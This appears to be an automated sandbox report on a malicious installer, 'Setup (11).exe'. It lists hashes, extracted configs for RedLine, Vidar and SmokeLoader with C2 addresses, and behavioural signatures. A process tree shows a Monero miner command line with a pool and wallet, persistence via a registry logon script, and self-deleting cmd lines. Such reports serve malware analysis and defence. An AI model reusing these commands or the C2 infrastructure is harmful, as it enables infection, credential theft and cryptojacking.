Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    1172s
  • max time network
    1773s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    24-08-2021 12:53

General

  • Target

    Setup (11).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

dibild2

C2

135.148.139.222:1494

Extracted

Family

redline

Botnet

24.08

C2

95.181.172.100:55640

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/

rc4.i32
rc4.i32

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 11 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 10 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 10 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 10 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 13 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 37 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 44 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 29 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 21 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 8 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 4 IoCs
  • Kills process with taskkill 9 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 22 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 31 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 40 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:1004
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Themes
      1⤵
        PID:1136
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
        1⤵
          PID:1096
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s UserManager
          1⤵
            PID:1344
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1296
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Schedule
              1⤵
              • Drops file in System32 directory
              PID:932
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Browser
              1⤵
              • Suspicious use of SetThreadContext
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              PID:2768
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k SystemNetworkService
                2⤵
                • Drops file in System32 directory
                • Checks processor information in registry
                • Modifies data under HKEY_USERS
                • Modifies registry class
                PID:5596
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
              1⤵
                PID:2688
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2660
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                1⤵
                  PID:2460
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                  1⤵
                    PID:2424
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                    1⤵
                      PID:1764
                    • C:\Users\Admin\AppData\Local\Temp\Setup (11).exe
                      "C:\Users\Admin\AppData\Local\Temp\Setup (11).exe"
                      1⤵
                      • Checks computer location settings
                      • Modifies system certificate store
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of WriteProcessMemory
                      PID:900
                      • C:\Users\Admin\Documents\aFJOPqUwUqFnlxblicy3A33V.exe
                        "C:\Users\Admin\Documents\aFJOPqUwUqFnlxblicy3A33V.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:2180
                        • C:\Users\Admin\Documents\aFJOPqUwUqFnlxblicy3A33V.exe
                          "C:\Users\Admin\Documents\aFJOPqUwUqFnlxblicy3A33V.exe"
                          3⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: MapViewOfSection
                          PID:928
                      • C:\Users\Admin\Documents\UhbXzkSCAWJrxOp3vFXSdGmH.exe
                        "C:\Users\Admin\Documents\UhbXzkSCAWJrxOp3vFXSdGmH.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious use of WriteProcessMemory
                        PID:3008
                        • C:\Users\Admin\Documents\UhbXzkSCAWJrxOp3vFXSdGmH.exe
                          C:\Users\Admin\Documents\UhbXzkSCAWJrxOp3vFXSdGmH.exe
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4256
                      • C:\Users\Admin\Documents\oDohxJySelcfa7gbDuUWduZO.exe
                        "C:\Users\Admin\Documents\oDohxJySelcfa7gbDuUWduZO.exe"
                        2⤵
                        • Executes dropped EXE
                        PID:3972
                        • C:\Users\Admin\Documents\oDohxJySelcfa7gbDuUWduZO.exe
                          "C:\Users\Admin\Documents\oDohxJySelcfa7gbDuUWduZO.exe" -q
                          3⤵
                          • Executes dropped EXE
                          PID:5040
                      • C:\Users\Admin\Documents\_b3kq5GGDmoMEZdbyIU5iMnW.exe
                        "C:\Users\Admin\Documents\_b3kq5GGDmoMEZdbyIU5iMnW.exe"
                        2⤵
                        • Executes dropped EXE
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3988
                      • C:\Users\Admin\Documents\U7hmrlYwNGwlp7PXDu0MChHl.exe
                        "C:\Users\Admin\Documents\U7hmrlYwNGwlp7PXDu0MChHl.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3528
                        • C:\Users\Admin\AppData\Roaming\5026163.exe
                          "C:\Users\Admin\AppData\Roaming\5026163.exe"
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4516
                        • C:\Users\Admin\AppData\Roaming\1756170.exe
                          "C:\Users\Admin\AppData\Roaming\1756170.exe"
                          3⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          PID:4720
                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                            4⤵
                            • Executes dropped EXE
                            PID:4724
                        • C:\Users\Admin\AppData\Roaming\3876137.exe
                          "C:\Users\Admin\AppData\Roaming\3876137.exe"
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4048
                        • C:\Users\Admin\AppData\Roaming\5550978.exe
                          "C:\Users\Admin\AppData\Roaming\5550978.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4020
                      • C:\Users\Admin\Documents\lp5Ek30UaGG63InHbBbIPwwY.exe
                        "C:\Users\Admin\Documents\lp5Ek30UaGG63InHbBbIPwwY.exe"
                        2⤵
                        • Executes dropped EXE
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3940
                      • C:\Users\Admin\Documents\6glXC4K0QezAkAabo4CBUvVo.exe
                        "C:\Users\Admin\Documents\6glXC4K0QezAkAabo4CBUvVo.exe"
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Adds Run key to start application
                        • Drops file in System32 directory
                        • Drops file in Windows directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3872
                        • C:\Users\Admin\Documents\6glXC4K0QezAkAabo4CBUvVo.exe
                          "C:\Users\Admin\Documents\6glXC4K0QezAkAabo4CBUvVo.exe"
                          3⤵
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in System32 directory
                          • Modifies registry class
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3904
                      • C:\Users\Admin\Documents\GJmzNPbzIjIfZeK9zczlzeZN.exe
                        "C:\Users\Admin\Documents\GJmzNPbzIjIfZeK9zczlzeZN.exe"
                        2⤵
                        • Executes dropped EXE
                        PID:3476
                      • C:\Users\Admin\Documents\E2TVZbBMO7Ololsin2WDUYNn.exe
                        "C:\Users\Admin\Documents\E2TVZbBMO7Ololsin2WDUYNn.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:800
                        • C:\Users\Admin\Documents\E2TVZbBMO7Ololsin2WDUYNn.exe
                          C:\Users\Admin\Documents\E2TVZbBMO7Ololsin2WDUYNn.exe
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4244
                      • C:\Users\Admin\Documents\1A4OdzJ_oTIKya1tQvnAP6gY.exe
                        "C:\Users\Admin\Documents\1A4OdzJ_oTIKya1tQvnAP6gY.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3700
                        • C:\Users\Admin\Documents\1A4OdzJ_oTIKya1tQvnAP6gY.exe
                          "C:\Users\Admin\Documents\1A4OdzJ_oTIKya1tQvnAP6gY.exe"
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4064
                      • C:\Users\Admin\Documents\k78MLB7taaMyeCbzdyJjtSGD.exe
                        "C:\Users\Admin\Documents\k78MLB7taaMyeCbzdyJjtSGD.exe"
                        2⤵
                        • Executes dropped EXE
                        PID:2080
                      • C:\Users\Admin\Documents\P_dVAEwr3C8rTKIwQ8z_fVVb.exe
                        "C:\Users\Admin\Documents\P_dVAEwr3C8rTKIwQ8z_fVVb.exe"
                        2⤵
                          PID:4020
                        • C:\Users\Admin\Documents\AjnLP9ddHfyQIX8alwfpUPCK.exe
                          "C:\Users\Admin\Documents\AjnLP9ddHfyQIX8alwfpUPCK.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:1040
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 388
                            3⤵
                            • Program crash
                            PID:4568
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 368
                            3⤵
                            • Program crash
                            PID:2132
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 424
                            3⤵
                            • Program crash
                            PID:4396
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 624
                            3⤵
                            • Program crash
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1060
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 660
                            3⤵
                            • Program crash
                            PID:5156
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 696
                            3⤵
                            • Program crash
                            PID:5352
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 644
                            3⤵
                            • Program crash
                            PID:5544
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 708
                            3⤵
                            • Program crash
                            PID:5708
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 840
                            3⤵
                            • Program crash
                            PID:7432
                        • C:\Users\Admin\Documents\Pgcx6zpgnd6LpZVp7gwy4mrT.exe
                          "C:\Users\Admin\Documents\Pgcx6zpgnd6LpZVp7gwy4mrT.exe"
                          2⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks processor information in registry
                          PID:4304
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /im Pgcx6zpgnd6LpZVp7gwy4mrT.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\Pgcx6zpgnd6LpZVp7gwy4mrT.exe" & del C:\ProgramData\*.dll & exit
                            3⤵
                              PID:6416
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /im Pgcx6zpgnd6LpZVp7gwy4mrT.exe /f
                                4⤵
                                • Kills process with taskkill
                                PID:6664
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /t 6
                                4⤵
                                • Delays execution with timeout.exe
                                PID:1452
                          • C:\Users\Admin\Documents\cBv2p7OXDdwRrulJCOvb3ZK5.exe
                            "C:\Users\Admin\Documents\cBv2p7OXDdwRrulJCOvb3ZK5.exe"
                            2⤵
                            • Executes dropped EXE
                            • Checks BIOS information in registry
                            • Checks whether UAC is enabled
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4348
                          • C:\Users\Admin\Documents\iCFOoRSApC2T1BGcT0GBvzcd.exe
                            "C:\Users\Admin\Documents\iCFOoRSApC2T1BGcT0GBvzcd.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:4336
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4336 -s 476
                              3⤵
                              • Suspicious use of NtCreateProcessExOtherParentProcess
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1484
                          • C:\Users\Admin\Documents\BYE88TUJEnavGHcmUESUxMlq.exe
                            "C:\Users\Admin\Documents\BYE88TUJEnavGHcmUESUxMlq.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:4688
                            • C:\Users\Admin\AppData\Local\Temp\is-5KRKK.tmp\BYE88TUJEnavGHcmUESUxMlq.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-5KRKK.tmp\BYE88TUJEnavGHcmUESUxMlq.tmp" /SL5="$1023A,138429,56832,C:\Users\Admin\Documents\BYE88TUJEnavGHcmUESUxMlq.exe"
                              3⤵
                                PID:4904
                                • C:\Users\Admin\AppData\Local\Temp\is-H6QOJ.tmp\Setup.exe
                                  "C:\Users\Admin\AppData\Local\Temp\is-H6QOJ.tmp\Setup.exe" /Verysilent
                                  4⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  PID:888
                                  • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
                                    "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                    5⤵
                                    • Executes dropped EXE
                                    PID:5816
                                    • C:\Users\Admin\AppData\Local\Temp\is-OND28.tmp\Stats.tmp
                                      "C:\Users\Admin\AppData\Local\Temp\is-OND28.tmp\Stats.tmp" /SL5="$10366,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                      6⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of FindShellTrayWindow
                                      PID:5996
                                      • C:\Users\Admin\AppData\Local\Temp\is-BSVVA.tmp\builder.exe
                                        "C:\Users\Admin\AppData\Local\Temp\is-BSVVA.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
                                        7⤵
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious use of SetWindowsHookEx
                                        PID:6776
                                  • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                    "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                    5⤵
                                      PID:5848
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c taskkill /im runvd.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe" & del C:\ProgramData\*.dll & exit
                                        6⤵
                                          PID:8156
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /im runvd.exe /f
                                            7⤵
                                            • Kills process with taskkill
                                            PID:2184
                                          • C:\Windows\SysWOW64\timeout.exe
                                            timeout /t 6
                                            7⤵
                                            • Delays execution with timeout.exe
                                            PID:8812
                                      • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                        "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                        5⤵
                                        • Executes dropped EXE
                                        PID:5880
                                        • C:\Users\Admin\AppData\Local\Temp\is-0FHS9.tmp\Inlog.tmp
                                          "C:\Users\Admin\AppData\Local\Temp\is-0FHS9.tmp\Inlog.tmp" /SL5="$601E4,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Suspicious use of FindShellTrayWindow
                                          PID:6060
                                          • C:\Users\Admin\AppData\Local\Temp\is-MS4A3.tmp\Setup.exe
                                            "C:\Users\Admin\AppData\Local\Temp\is-MS4A3.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                            7⤵
                                              PID:7844
                                              • C:\Users\Admin\AppData\Local\Temp\is-P5BT0.tmp\Setup.tmp
                                                "C:\Users\Admin\AppData\Local\Temp\is-P5BT0.tmp\Setup.tmp" /SL5="$20474,17339287,721408,C:\Users\Admin\AppData\Local\Temp\is-MS4A3.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                8⤵
                                                • Loads dropped DLL
                                                • Drops file in Program Files directory
                                                • Suspicious use of FindShellTrayWindow
                                                PID:8100
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-KB3M5.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                  9⤵
                                                    PID:996
                                                    • C:\Windows\SysWOW64\expand.exe
                                                      expand C:\Users\Admin\AppData\Local\Temp\is-KB3M5.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                      10⤵
                                                      • Drops file in Windows directory
                                                      PID:6760
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                    9⤵
                                                      PID:8544
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                        10⤵
                                                          PID:3216
                                                      • C:\Users\Admin\AppData\Local\Temp\is-KB3M5.tmp\{app}\vdi_compiler.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\is-KB3M5.tmp\{app}\vdi_compiler"
                                                        9⤵
                                                          PID:9564
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                          9⤵
                                                          • Checks computer location settings
                                                          PID:2652
                                                        • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                          "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                          9⤵
                                                            PID:7680
                                                  • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                    "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Enumerates connected drives
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:5912
                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629557307 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                      6⤵
                                                      • Enumerates connected drives
                                                      PID:7304
                                                  • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                    "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:6028
                                                    • C:\Users\Admin\AppData\Local\Temp\is-1LFCM.tmp\VPN.tmp
                                                      "C:\Users\Admin\AppData\Local\Temp\is-1LFCM.tmp\VPN.tmp" /SL5="$103A4,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:5436
                                                      • C:\Users\Admin\AppData\Local\Temp\is-K4VHO.tmp\Setup.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\is-K4VHO.tmp\Setup.exe" /silent /subid=720
                                                        7⤵
                                                          PID:8184
                                                          • C:\Users\Admin\AppData\Local\Temp\is-69FND.tmp\Setup.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-69FND.tmp\Setup.tmp" /SL5="$205A8,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-K4VHO.tmp\Setup.exe" /silent /subid=720
                                                            8⤵
                                                            • Loads dropped DLL
                                                            • Drops file in Program Files directory
                                                            • Modifies system certificate store
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:7496
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                              9⤵
                                                                PID:2288
                                                                • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                  tapinstall.exe remove tap0901
                                                                  10⤵
                                                                  • Checks SCSI registry key(s)
                                                                  PID:6896
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                9⤵
                                                                • Blocklisted process makes network request
                                                                • Loads dropped DLL
                                                                • Suspicious use of FindShellTrayWindow
                                                                PID:7816
                                                                • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                  tapinstall.exe install OemVista.inf tap0901
                                                                  10⤵
                                                                  • Drops file in System32 directory
                                                                  • Drops file in Windows directory
                                                                  • Checks SCSI registry key(s)
                                                                  PID:5432
                                                              • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                9⤵
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                PID:9748
                                                              • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                9⤵
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                PID:8196
                                                      • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                        "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                        5⤵
                                                          PID:6092
                                                          • C:\Users\Admin\AppData\Roaming\2005442.exe
                                                            "C:\Users\Admin\AppData\Roaming\2005442.exe"
                                                            6⤵
                                                              PID:6368
                                                            • C:\Users\Admin\AppData\Roaming\6358739.exe
                                                              "C:\Users\Admin\AppData\Roaming\6358739.exe"
                                                              6⤵
                                                              • Suspicious behavior: SetClipboardViewer
                                                              PID:6408
                                                            • C:\Users\Admin\AppData\Roaming\6943644.exe
                                                              "C:\Users\Admin\AppData\Roaming\6943644.exe"
                                                              6⤵
                                                                PID:6468
                                                                • C:\Windows\System32\Conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  7⤵
                                                                    PID:6532
                                                                • C:\Users\Admin\AppData\Roaming\8226190.exe
                                                                  "C:\Users\Admin\AppData\Roaming\8226190.exe"
                                                                  6⤵
                                                                    PID:5096
